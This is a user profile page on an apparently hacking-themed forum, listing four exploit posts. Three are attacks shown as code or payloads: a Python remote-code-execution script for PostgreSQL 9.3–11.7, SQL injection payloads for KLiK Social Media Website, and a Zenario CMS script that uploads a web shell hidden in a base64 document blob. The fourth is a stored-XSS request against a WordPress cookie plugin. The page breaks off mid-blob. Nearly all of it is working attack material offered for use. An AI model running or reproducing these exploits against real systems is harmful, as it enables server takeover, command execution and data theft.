Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-03-29 # Exploit Author: b4keSn4ke # Github: https://github.com/b4keSn4ke # Vendor Homepage: https://www.postgresql.org/ # Software Link: https://www.postgresql.org/download/linux/debian/ # Version: 9.3 - 11.7 # Tested on: Linux x86-64 - Debian 4.19 # CVE: CVE-2019–9193 #!/usr/bin/python3 import psycopg2 import argparse import hashlib import time def parseArgs(): parser = argparse.ArgumentParser(description='CVE-2019–9193 - PostgreSQL 9.3-11.7 Authenticated Remote Code Execution') parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') parser.add_argument('-d', '--database', nargs='?', default='template1', help='Name of the PostgreSQL DB [Default: template1]') parser.add_argument('-c', '--command', nargs='?', help='System command to run') parser.add_argument('-t', '--timeout', nargs='?', type=int, default=10, help='Connection timeout in seconds [Default: 10 (seconds)]') parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]') parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]') args = parser.parse_args() return args def main(): try: print ("\r\n[+] Connecting to PostgreSQL Database on {0}:{1}".format(args.ip, args.port)) connection = psycopg2.connect ( database=args.database, user=args.user, password=args.password, host=args.ip, port=args.port, connect_timeout=args.timeout ) print ("[+] Connection to Database established") print ("[+] Checking PostgreSQL version") checkVersion(connection) if(args.command): exploit(connection) else: print ("[+] Add the argument -c [COMMAND] to execute a system command") except psycopg2.OperationalError as e: print ("\r\n[-] Connection to Database failed: \r\n{0}".format(e)) exit() def checkVersion(connection): cursor = connection.cursor() cursor.execute("SELECT version()") record = cursor.fetchall() cursor.close() result = deserialize(record) version = float(result[(result.find("PostgreSQL")+11):(result.find("PostgreSQL")+11)+4]) if (version >= 9.3 and version <= 11.7): print("[+] PostgreSQL {0} is likely vulnerable".format(version)) else: print("[-] PostgreSQL {0} is not vulnerable".format(version)) exit() def deserialize(record): result = "" for rec in record: result += rec[0]+"\r\n" return result def randomizeTableName(): return ("_" + hashlib.md5(time.ctime().encode('utf-8')).hexdigest()) def exploit(connection): cursor = connection.cursor() tableName = randomizeTableName() try: print ("[+] Creating table {0}".format(tableName)) cursor.execute("DROP TABLE IF EXISTS {1};\ CREATE TABLE {1}(cmd_output text);\ COPY {1} FROM PROGRAM '{0}';\ SELECT * FROM {1};".format(args.command,tableName)) print ("[+] Command executed\r\n") record = cursor.fetchall() result = deserialize(record) print(result) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() except psycopg2.errors.ExternalRoutineException as e: print ("[-] Command failed : {0}".format(e.pgerror)) print ("[+] Deleting table {0}\r\n".format(tableName)) cursor = connection.cursor() cursor.execute("DROP TABLE {0};".format(tableName)) cursor.close() finally: exit() if __name__ == "__main__": args = parseArgs() main()
  2. HireHackking

    WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS # Date: 2/27/2021 # Author: 0xB9 # Software Link: https://wordpress.org/plugins/easy-cookies-policy/ # Version: 1.6.2 # Tested on: Windows 10 # CVE: CVE-2021-24405 1. Description: Broken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php. If users can't register, this can be done through CSRF. 2. Proof of Concept: POST http://localhost/wp-admin/admin-ajax.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Referer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 226 Origin: http://localhost Connection: keep-alive Host: localhost Cookie: [Any authenticated user] action=easy_cookies_policy_save_settings&maintext=<script>alert(1)</script>&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd
  3. HireHackking

    KLiK Social Media Website 1.0 - 'Multiple' SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi # Date: April 1st, 2022 # Exploit Author: corpse # Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite # Version: 1.0 # Tested on: Debian 11 Parameter: poll (GET) Type: time-based blind Title: MySQL time-based blind - Parameter replace (ELT) Payload: poll=ELT(1079=1079,SLEEP(5)) Parameter: pollID (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS) Parameter: voteOpt (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15
  4. HireHackking

    Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) # Date: 04/02/2022 # Exploit Author: minhnq22 # Vendor Homepage: https://zenar.io/ # Software Link: https://zenar.io/download-page # Version: 9.0.54156 # Tested on: Ubuntu 21.04 # CVE : CVE-2021–42171 # Python3 import os import sys import json import uuid import base64 import requests # Input if len(sys.argv) != 4: print("Usage: " + sys.argv[0] + " 'http(s)://TARGET/zenario' 'USERNAME' 'PASSWORD'") exit(1) TARGET = sys.argv[1] USERNAME = sys.argv[2] PASSWORD = sys.argv[3] ## Attempt to log in ### Get cookie resp = requests.get(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D") ### Grab the PHP session ID PHPSESSID = resp.headers['Set-Cookie'].split(";")[0] ### Authen with cookie resp = requests.post(TARGET + "/zenario/admin/welcome.ajax.php?task=&get=%5B%5D", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID}, data={"_validate": "true", "_box": '{"tab":"login","tabs":{"login":{"edit_mode":{"on":1},"fields":{"reset":{"_was_hidden_before":true},"description":{},"username":{"current_value":"' + USERNAME + '"},"password":{"current_value":"' + PASSWORD + '"},"admin_login_captcha":{"_was_hidden_before":true,"current_value":""},"remember_me":{"current_value":false},"login":{"pressed":true},"forgot":{"pressed":false},"previous":{"pressed":false}}},"forgot":{"edit_mode":{"on":1},"fields":{"description":{},"email":{"current_value":""},"previous":{},"reset":{}}}},"path":"login"}'}) # If login OK print("Login OK!") ## Upload web shell ### Get sync info resp = requests.post(TARGET + "/zenario/admin/admin_boxes.ajax.php?path=zenario_document_upload", headers={"X-Requested-With": "XMLHttpRequest", "Cookie": PHPSESSID, "Referer": TARGET + "/zenario/admin/organizer.php?fromCID=1&fromCType=html"}, data={"_fill": "true", "_values": ""}) resp_body = json.loads(resp.text) password_sync = resp_body["_sync"]["password"] iv_sync = resp_body["_sync"]["iv"] cache_dir_sync = resp_body["_sync"]["cache_dir"] ### Create blank docx file file_content = b"UEsDBBQABgAIAAAAIQDfpNJsWgEAACAFAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAAC\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC0\nlMtuwjAQRfeV+g+Rt1Vi6KKqKgKLPpYtUukHGHsCVv2Sx7z+vhMCUVUBkQpsIiUz994zVsaD0dqa\nbAkRtXcl6xc9loGTXmk3K9nX5C1/ZBkm4ZQw3kHJNoBsNLy9GUw2ATAjtcOSzVMKT5yjnIMVWPgA\njiqVj1Ykeo0zHoT8FjPg973eA5feJXApT7UHGw5eoBILk7LXNX1uSCIYZNlz01hnlUyEYLQUiep8\n6dSflHyXUJBy24NzHfCOGhg/mFBXjgfsdB90NFEryMYipndhqYuvfFRcebmwpCxO2xzg9FWlJbT6\n2i1ELwGRztyaoq1Yod2e/ygHpo0BvDxF49sdDymR4BoAO+dOhBVMP69G8cu8E6Si3ImYGrg8Rmvd\nCZFoA6F59s/m2NqciqTOcfQBaaPjP8ber2ytzmngADHp039dm0jWZ88H9W2gQB3I5tv7bfgDAAD/\n/wMAUEsDBBQABgAIAAAAIQAekRq37wAAAE4CAAALAAgCX3JlbHMvLnJlbHMgogQCKKAAAgAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArJLBasMw\nDEDvg/2D0b1R2sEYo04vY9DbGNkHCFtJTBPb2GrX/v082NgCXelhR8vS05PQenOcRnXglF3wGpZV\nDYq9Cdb5XsNb+7x4AJWFvKUxeNZw4gyb5vZm/cojSSnKg4tZFYrPGgaR+IiYzcAT5SpE9uWnC2ki\nKc/UYySzo55xVdf3mH4zoJkx1dZqSFt7B6o9Rb6GHbrOGX4KZj+xlzMtkI/C3rJdxFTqk7gyjWop\n9SwabDAvJZyRYqwKGvC80ep6o7+nxYmFLAmhCYkv+3xmXBJa/ueK5hk/Nu8hWbRf4W8bnF1B8wEA\nAP//AwBQSwMEFAAGAAgAAAAhAJdANEq+AgAAvQoAABEAAAB3b3JkL2RvY3VtZW50LnhtbKSW227b\nMAxA3wfsHwK/t7KdxEmNpkW7dkMfBhTr9gGKLNtCrQsk5bavH+X75q5w3BdbIs0jiiJpXd8eeTHb\n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\nsrUTDoe4K0c7gXCEuzKzEwgHuCsfO4HHkUnOr6